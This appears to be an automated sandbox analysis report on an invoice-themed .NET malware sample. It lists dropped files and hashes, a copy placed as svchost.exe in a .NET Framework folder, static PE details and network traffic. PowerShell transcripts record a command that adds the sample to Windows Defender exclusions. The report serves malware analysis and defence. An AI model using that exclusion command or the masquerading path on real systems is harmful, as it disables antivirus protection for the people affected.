SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qnzmxykz.rbj.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wkxxjrtw.qd5.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\Documents\20210222\PowerShell_transcript.320946.Re__E71x.20210222091427.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	894
Entropy (8bit):	5.376269224946531
Encrypted:	false
SSDEEP:	24:BxSAt3y7vBZOx2DOXUWeSuau1tiWUHjeTKKjX4CIym1ZJXSuau1t2:BZuvjOoO+SqUqDYB1ZcL
MD5:	595C0A5D974371A138CF928DDFC67706
SHA1:	25BC2F910113860D9A0BBC48107712027A222A49
SHA-256:	75B76911A4EABCA0C44848FB69957094B7FA7007A2FA8068973748C88C77B81D
SHA-512:	7B231034238919743D0E6431FEF27949EE9F26B02718DC0DD34F9CDCEA3B2244B3BD304C909DB2A1EBBAD7D019DE2F00E51F1C6952B22649CB034E0F77B5162B
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210222091454..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 320946 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe -Force..Process ID: 4488..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210222091454..********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe -Force..

C:\Users\user\Documents\20210222\PowerShell_transcript.320946.cMT2273D.20210222091415.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	5905
Entropy (8bit):	5.412975650143772
Encrypted:	false
SSDEEP:	96:BZJjONf23qDo1ZO23ZEjONf23qDo1ZELA9AzAjZmAjONf23qDo1ZVcADADALZy:XPyf+
MD5:	D685B014F0019A858EE92B195DCA090B
SHA1:	FFA1301E4F435E6B6146DFAE432E08788B47BC70
SHA-256:	82B5F4A49B04BE9C6A40BE04F9874463BDADB60D9C6A62CBA1F24FAAE5D624EB
SHA-512:	C5A498A372EB0320BF206186C4FD31FF70EE2E52CEBB636CF8C848623E579C5F6331FB13118761236A7E73534C734FF22A7959BDE1461198C436B3F5A29C0409
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210222091431..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 320946 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe -Force..Process ID: 7088..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210222091432..******************..PS>Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe -Force..********************..Windows PowerShell transcript start..Start time: 20210222091720..Usernam

C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe Download File
Process:	C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	209408
Entropy (8bit):	5.559500913037027
Encrypted:	false
SSDEEP:	1536:DVz5TWmVK3zUNBhgT2tPo55rKrFUcDOC53bzf01I:DVRV+bIFNMI
MD5:	379482795DA0042D0070E6AE599A369B
SHA1:	BAF26CFE3C8BA84FC3DA7CC2DA74741130F2BB21
SHA-256:	7D862F96808968BBE9CA5BF571335F86CD100FAA6D131A1E148EF8C54F5A4EED
SHA-512:	791604C6BEAD65E2D9E7D8BF4D355CA09078E0A98BAACFEC2D0A7B91F4B57EB18A6C48CC8FE24867B014E86312138905B3D144404A6E645DBEAB1D5ECEEBAA70
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 30%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0..x..........n.... ........@.. ..............................,B....@................................. ...K............................`....................................................... ............... ..H............text...tw... ...x.................. ..`.rsrc................z..............@..@.reloc.......`.......0..............@..B................P.......H.......h<...Z...........................................................".(.....~s.........s.........s.........B.(.......(......0...........r...p....r...p....s........+...&.......(...+o/.......88.......(0...........(1.......(.................(2...o'...&.....(3...........:...................o).........o4.......8........*........$.j........0...........r...p....r...p....s........+...'.......(...+o/.......88.......(0...........(1.......(.................(2...o'...&.....(3...

C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.559500913037027
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	CN-Invoice-XXXXX9808-19011143287989.exe
File size:	209408
MD5:	379482795da0042d0070e6ae599a369b
SHA1:	baf26cfe3c8ba84fc3da7cc2da74741130f2bb21
SHA256:	7d862f96808968bbe9ca5bf571335f86cd100faa6d131a1e148ef8c54f5a4eed
SHA512:	791604c6bead65e2d9e7d8bf4d355ca09078e0a98baacfec2d0a7b91f4b57eb18a6c48cc8fe24867b014e86312138905b3d144404a6e645dbeab1d5eceebaa70
SSDEEP:	1536:DVz5TWmVK3zUNBhgT2tPo55rKrFUcDOC53bzf01I:DVRV+bIFNMI
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..x..........n.... ........@.. ..............................,B....@................................

File Icon


Icon Hash:	68c6a6ce96b28acc

Static PE Info

General
Entrypoint:	0x40976e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x8AB4D40F [Tue Sep 29 02:29:35 2043 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
Subject Chain
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9720	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xa000	0x2b588	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x8000	0x19c0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x36000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x7774	0x7800	False	0.58984375	data	6.86065163545	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0xa000	0x2b588	0x2b600	False	0.209023775216	data	5.11612515343	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x36000	0xc	0x200	False	0.044921875	data	0.0815394123432	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0xa268	0x3751	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON	0xd9bc	0x10828	dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
RT_ICON	0x1e1e4	0x94a8	data
RT_ICON	0x2768c	0x5488	data
RT_ICON	0x2cb14	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 254, next used block 4286513152
RT_ICON	0x30d3c	0x25a8	data
RT_ICON	0x332e4	0x10a8	data
RT_ICON	0x3438c	0x988	data
RT_ICON	0x34d14	0x468	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x3517c	0x84	data
RT_VERSION	0x35200	0x388	data	English	United States

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
LegalCopyright	Copyright 2022 BxJYdGrf. All rights reserved.
Assembly Version	1.5.0.2
InternalName	RJFBoOwW.exe
FileVersion	5.6.1.0
CompanyName	SzicdLQh
LegalTrademarks	AJUBNIBr
Comments	WopzIgVT
ProductName	RJFBoOwW
ProductVersion	1.5.0.2
FileDescription	IPeVGEzN
OriginalFilename	RJFBoOwW.exe
Translation	0x0409 0x0514

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 22, 2021 09:13:24.126110077 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.179238081 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.179402113 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.180315971 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.233103991 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.351891041 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.351912022 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.351926088 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.351943016 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.351958990 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.351975918 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.351980925 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.351991892 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.352014065 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.352029085 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.352031946 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.352047920 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.352061033 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.352132082 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.353173018 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.353193045 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.353374958 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.354460955 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.354491949 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.354691982 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.355688095 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.355720043 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.356909990 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.356939077 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.356972933 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.357428074 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.358133078 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.358158112 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.358251095 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.359350920 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.359368086 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.359440088 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.379271030 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.379302025 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.379435062 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.379853964 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.379883051 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.380573988 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.381104946 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.381145000 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.381272078 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.382399082 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.382443905 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.382668972 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.404835939 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.404877901 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.405322075 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.405401945 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.405441999 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.406636953 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.406656027 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.406660080 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.407170057 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.407855034 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.407877922 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.407957077 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.409121037 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.409147024 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.409225941 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.410351038 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.410381079 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.410480976 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.411583900 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.411619902 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.411700010 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.412812948 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.412847042 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.413264990 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.414052963 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.414077044 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.414143085 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.415281057 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.415298939 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.415345907 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.416522980 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.416543007 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.417748928 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.417804003 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.418329000 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.418346882 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.418430090 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.419559956 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.419578075 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.419605017 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.420819044 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.420835972 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.420876026 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.422065973 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.422086000 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.422120094 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.423300982 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.423347950 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.423422098 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.424580097 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.424612045 CET	80	49733	104.21.71.230	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 22, 2021 09:13:15.086720943 CET	64646	53	192.168.2.4	8.8.8.8
Feb 22, 2021 09:13:15.135396004 CET	53	64646	8.8.8.8	192.168.2.4
Feb 22, 2021 09:13:15.222836018 CET	65298	53	192.168.2.4	8.8.8.8
Feb 22, 2021 09:13:15.271653891 CET	53	65298	8.8.8.8	192.168.2.4
Feb 22, 2021 09:13:15.325047970 CET	59123	53	192.168.2.4	8.8.8.8
Feb 22, 2021 09:13:15.373758078 CET	53	59123	8.8.8.8	192.168.2.4
Feb 22, 2021 09:13:17.073318958 CET	54531	53	192.168.2.4	8.8.8.8
Feb 22, 2021 09:13:17.134918928 CET	53	54531	8.8.8.8	192.168.2.4
Feb 22, 2021 09:13:18.262422085 CET	49714	53	192.168.2.4	8.8.8.8
Feb 22, 2021 09:13:18.311001062 CET	53	49714	8.8.8.8	192.168.2.4
Feb 22, 2021 09:13:19.077817917 CET	58028	53	192.168.2.4	8.8.8.8
Feb 22, 2021 09:13:19.126274109 CET	53	58028	8.8.8.8	192.168.2.4
Feb 22, 2021 09:13:20.199812889 CET	53097	53	192.168.2.4	8.8.8.8
Feb 22, 2021 09:13:20.251415968 CET	53	53097	8.8.8.8	192.168.2.4
Feb 22, 2021 09:13:20.422405005 CET	49257	53	192.168.2.4	8.8.8.8
Feb 22, 2021 09:13:20.480726004 CET	53	49257	8.8.8.8	192.168.2.4
Feb 22, 2021 09:13:21.041529894 CET	62389	53	192.168.2.4	8.8.8.8
Feb 22, 2021 09:13:21.094422102 CET	53	62389	8.8.8.8	192.168.2.4
Feb 22, 2021 09:13:22.155312061 CET	49910	53	192.168.2.4	8.8.8.8
Feb 22, 2021 09:13:22.204051018 CET	53	49910	8.8.8.8	192.168.2.4
Feb 22, 2021 09:13:23.058521032 CET	55854	53	192.168.2.4	8.8.8.8
Feb 22, 2021 09:13:23.112194061 CET	53	55854	8.8.8.8	192.168.2.4
Feb 22, 2021 09:13:24.041982889 CET	64549	53	192.168.2.4	8.8.8.8
Feb 22, 2021 09:13:24.045172930 CET	63153	53	192.168.2.4	8.8.8.8
Feb 22, 2021 09:13:24.093765020 CET	53	63153	8.8.8.8	192.168.2.4
Feb 22, 2021 09:13:24.104845047 CET	53	64549	8.8.8.8	192.168.2.4
Feb 22, 2021 09:13:24.831636906 CET	52991	53	192.168.2.4	8.8.8.8
Feb 22, 2021 09:13:24.882272959 CET	53	52991	8.8.8.8	192.168.2.4
Feb 22, 2021 09:13:25.777785063 CET	53700	53	192.168.2.4	8.8.8.8
Feb 22, 2021 09:13:25.829142094 CET	53	53700	8.8.8.8	192.168.2.4
Feb 22, 2021 09:13:26.726569891 CET	51726	53	192.168.2.4	8.8.8.8
Feb 22, 2021 09:13:26.786441088 CET	53	51726	8.8.8.8	192.168.2.4
Feb 22, 2021 09:13:27.523122072 CET	56794	53	192.168.2.4	8.8.8.8
Feb 22, 2021 09:13:27.584074974 CET	53	56794	8.8.8.8	192.168.2.4
Feb 22, 2021 09:13:28.392894030 CET	56534	53	192.168.2.4	8.8.8.8
Feb 22, 2021 09:13:28.442080975 CET	53	56534	8.8.8.8	192.168.2.4
Feb 22, 2021 09:13:49.550407887 CET	56627	53	192.168.2.4	8.8.8.8
Feb 22, 2021 09:13:49.554924965 CET	56621	53	192.168.2.4	8.8.8.8
Feb 22, 2021 09:13:49.602521896 CET	53	56627	8.8.8.8	192.168.2.4
Feb 22, 2021 09:13:49.603423119 CET	53	56621	8.8.8.8	192.168.2.4
Feb 22, 2021 09:13:51.110774994 CET	63116	53	192.168.2.4	8.8.8.8
Feb 22, 2021 09:13:51.159513950 CET	53	63116	8.8.8.8	192.168.2.4
Feb 22, 2021 09:13:52.243163109 CET	64078	53	192.168.2.4	8.8.8.8
Feb 22, 2021 09:13:52.294497967 CET	53	64078	8.8.8.8	192.168.2.4
Feb 22, 2021 09:13:53.706492901 CET	64801	53	192.168.2.4	8.8.8.8
Feb 22, 2021 09:13:53.755330086 CET	53	64801	8.8.8.8	192.168.2.4
Feb 22, 2021 09:13:55.107254028 CET	61721	53	192.168.2.4	8.8.8.8
Feb 22, 2021 09:13:55.156011105 CET	53	61721	8.8.8.8	192.168.2.4
Feb 22, 2021 09:13:56.104125023 CET	51255	53	192.168.2.4	8.8.8.8
Feb 22, 2021 09:13:56.156059027 CET	53	51255	8.8.8.8	192.168.2.4
Feb 22, 2021 09:14:10.175246954 CET	61522	53	192.168.2.4	8.8.8.8
Feb 22, 2021 09:14:10.229494095 CET	53	61522	8.8.8.8	192.168.2.4
Feb 22, 2021 09:14:19.654503107 CET	52337	53	192.168.2.4	8.8.8.8
Feb 22, 2021 09:14:19.706439018 CET	53	52337	8.8.8.8	192.168.2.4
Feb 22, 2021 09:14:20.396497965 CET	55046	53	192.168.2.4	8.8.8.8
Feb 22, 2021 09:14:20.455003977 CET	53	55046	8.8.8.8	192.168.2.4
Feb 22, 2021 09:14:21.090650082 CET	49612	53	192.168.2.4	8.8.8.8
Feb 22, 2021 09:14:21.142138004 CET	53	49612	8.8.8.8	192.168.2.4
